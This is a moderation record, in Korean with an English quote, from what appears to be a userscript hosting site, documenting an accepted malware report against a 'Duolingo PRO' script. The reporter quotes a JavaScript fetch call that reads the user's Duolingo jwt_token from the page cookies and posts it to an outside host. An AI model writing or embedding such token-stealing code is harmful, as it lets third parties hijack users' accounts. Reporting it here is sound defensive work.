Duolingo PRO 항목이 2025-03-23에 악성 코드 사유로 신고되었습니다.

신고자의 글:

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part


            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

이 스크립트는 신고가 접수된 이후 업데이트되었습니다.

이 스크립트에는 이전에 인정되거나 수정된 신고가 1건 있습니다.

anonymoushackerIV (신고된 사용자)의 활동:

interstellar (신고된 사용자)의 활동:

이 신고는 관리자에 의해 인정되었습니다.